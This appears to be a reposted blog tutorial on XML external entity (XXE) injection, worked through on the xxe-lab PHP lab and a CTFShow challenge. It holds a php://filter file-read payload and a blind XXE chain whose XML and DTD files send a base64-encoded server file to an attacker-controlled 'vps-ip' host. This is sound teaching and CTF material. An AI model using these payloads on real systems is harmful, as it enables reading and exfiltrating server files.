XML external entity injection; XXE vulnerability; XXE has echo injection; XXE has no echo injection; Blind XXE

Others 2021-04-01 19:31:47 views: null

Vulnerability principle

The XE vulnerability occurs when the application is parsing the XML input without prohibiting the loading of external entities, causing malicious external files to be loaded, resulting in file reading, command execution, and intranet port scanning. The XXE vulnerability is often triggered by the location where the XML file can be uploaded. The uploaded XML file is not filtered, resulting in the upload of malicious XML files.

Environment setup

Address: https://github.com/c0ny1/xxe-lab After
downloading, put PHP_XXE in the www directory of PHPstudy to access
Insert picture description here

XXE has echo injection

First grab the packet at the login, you can see that the parameter transfer format is XML, and there may be XML injection.
Insert picture description here
Send the data packet to the Repeater module for the next analysis.
Insert picture description here
You can see that the content echoed in the response packet is username, and then use the XXE vulnerability to read the file.
Insert picture description here
It can be read directly when reading the txt file, but when reading the php file, the php code may not be displayed due to the browser's parsing. This requires base64 encoding of the code before reading it out.

php://filter/read=convert.base64-encode/resource=文件地址

Insert picture description here
Base64 decoding can get the content of abc.php
Insert picture description here

XXE no echo injection

When a Web program can parse XML input, but there is no output response, this kind of injection is called blind injection XXE. So in order to test this blind XXE, we can use an external entity other than the file path to request the web application here.

Here is a topic from CTFShow to explain.
https://ctf.show/challenges#web4_%E8%A7%82%E5%BF%83-340
Insert picture description here
Click for divination, grab the packet to see the data. Seeing that it requested an external xml, it can be speculated that there is XXE injection.
Insert picture description here
At the same time, because the request is initiated from a server on the public network, we need to construct an attack chain on our own server.
First, open the Apache service and place the files we constructed under /var/www/html so that we can access it.

service apache2 start

Create a test.xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert-base64.encode/resource=/flag.txt">
<!ENTITY % remote SYSTEM "http://vps-ip/test.dtd">
%remote;
%dtd;
%xxe;
]>

Create a test.dtd

<!ENTITY % dtd "<!ENTITY xxe SYSTEM 'http://vps-ip/pass=%file;'>">
%dtd;
%xxe;

Then initiate a request to
Insert picture description here
get the flag.

Guess you like

Origin blog.csdn.net/weixin_43749601/article/details/115330101
Recommended
The “35-year-old curse” of Chinese coders
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Ranking
Methods and Practices of Manufacturing Data Quality Improvement
Serial port upgrade program for efficient transmission of large firmware
Use KITTI to run LIOSAM and complete the EVO evaluation
Calling methods on string literals (Java)
ActiveMQ and Spring integration (4)
You have to know the HTTPS! ! !
PAT whether Structures and Algorithms 7-4 with a binary search tree (40 rows streamlined structure)
el-upload brings request background
UVA - 1204 Fun Game-like pressure dp
2019-12-28
Daily
More
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)

Code World

© 2018 codetd.com